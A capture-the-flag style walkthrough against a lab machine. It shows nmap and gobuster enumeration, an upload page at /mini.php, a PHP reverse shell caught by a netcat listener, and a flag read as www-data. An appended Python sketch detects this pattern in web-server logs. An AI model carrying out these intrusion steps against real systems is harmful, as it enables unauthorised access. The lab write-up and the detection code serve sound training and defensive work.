┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 192.168.72.132
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
| 256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
|_ 256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.72.132 -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10918]
/javascript (Status: 301) [Size: 321] [--> http://192.168.72.132/javascript/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.72.132/phpmyadmin/]
/robots.txt (Status: 200) [Size: 21]
/server-status (Status: 403) [Size: 279]
On /robots.txt we see this
Doing another round of fuzzing on /phpmyadmin:
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.72.132/phpmyadmin -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/doc (Status: 301) [Size: 325] [--> http://192.168.72.132/phpmyadmin/doc/]
/favicon.ico (Status: 200) [Size: 22486]
/index.php (Status: 200) [Size: 10531]
/js (Status: 301) [Size: 324] [--> http://192.168.72.132/phpmyadmin/js/]
/libraries (Status: 403) [Size: 279]
/locale (Status: 301) [Size: 328] [--> http://192.168.72.132/phpmyadmin/locale/]
/phpinfo.php (Status: 200) [Size: 10533]
/setup (Status: 401) [Size: 461]
/sql (Status: 301) [Size: 325] [--> http://192.168.72.132/phpmyadmin/sql/]
/templates (Status: 403) [Size: 279]
/themes (Status: 301) [Size: 328] [--> http://192.168.72.132/phpmyadmin/themes/]
After a while and some failed exploitation attempts, I went back to fuzzing, this time with an extension:
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.72.132 -w /usr/share/wordlists/dirb/common.txt -q -t 100 -x php
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10918]
/javascript (Status: 301) [Size: 321] [--> http://192.168.72.132/javascript/]
/mini.php (Status: 200) [Size: 3828]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.72.132/phpmyadmin/]
/robots.txt (Status: 200) [Size: 21]
/server-status (Status: 403) [Size: 279]
Nani?!! /mini.php
What is that?!!
There is an upload portal, let's……
Then we visit 192.168.72.132/php-reverse-shell.php with netcat listening:
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.72] from (UNKNOWN) [192.168.72.132] 58590
Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:57:14 up 35 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
There is a local.txt at /var/www:
$ pwd
/var/www
$ cat local.txt
3ed9b84235d05d87e0746c990614b9f8
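From the defender's side, the sequence in this walkthrough leaves a clear trail in the web server's access log: a burst of 403 responses from directory fuzzing, then a request for a PHP file that had never been served before the same client POSTed to a PHP script. The detection sketch below is an added example, not part of the original writeup; the log lines are constructed, and the assumption that the file reached the web root through a POST to /mini.php is inferred from the "upload portal" remark.

```python
import re
from collections import defaultdict

# Constructed Apache access-log lines (timestamps, sizes and client 10.0.0.5 are made up).
SAMPLE_LOG = """\
192.168.49.72 - - [01/Jan/2021:13:40:01 +0000] "GET /.hta HTTP/1.1" 403 279
192.168.49.72 - - [01/Jan/2021:13:40:01 +0000] "GET /.htaccess HTTP/1.1" 403 279
192.168.49.72 - - [01/Jan/2021:13:40:01 +0000] "GET /.htpasswd HTTP/1.1" 403 279
192.168.49.72 - - [01/Jan/2021:13:40:02 +0000] "GET /.hta.php HTTP/1.1" 403 279
192.168.49.72 - - [01/Jan/2021:13:40:02 +0000] "GET /.htaccess.php HTTP/1.1" 403 279
192.168.49.72 - - [01/Jan/2021:13:45:10 +0000] "GET /mini.php HTTP/1.1" 200 3828
192.168.49.72 - - [01/Jan/2021:13:46:30 +0000] "POST /mini.php HTTP/1.1" 200 3900
192.168.49.72 - - [01/Jan/2021:13:57:14 +0000] "GET /php-reverse-shell.php HTTP/1.1" 200 92
10.0.0.5 - - [01/Jan/2021:13:58:00 +0000] "GET /mini.php HTTP/1.1" 200 3828
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def is_php(path):
    return path.split("?", 1)[0].lower().endswith(".php")

def analyse(log_text, miss_threshold=5):
    """Return (kind, client, path) alerts in log order."""
    missed = defaultdict(set)   # client -> distinct paths answered with 403/404
    seen_php = set()            # PHP paths already served with 200 (the baseline)
    uploaders = set()           # clients that successfully POSTed to a PHP script
    flagged, alerts = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m["ip"], m["method"], m["path"], int(m["status"])
        if status in (403, 404):
            missed[ip].add(path)
            if len(missed[ip]) >= miss_threshold and ip not in flagged:
                flagged.add(ip)     # alert once per client
                alerts.append(("enumeration", ip, path))
        elif status == 200 and is_php(path):
            if method == "POST":
                uploaders.add(ip)
            elif ip in uploaders and path not in seen_php:
                alerts.append(("new-php-after-post", ip, path))
            seen_php.add(path)
    return alerts

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

In production the `seen_php` baseline would come from the deployed file list rather than from the log itself, and the upload directory should not execute PHP at all.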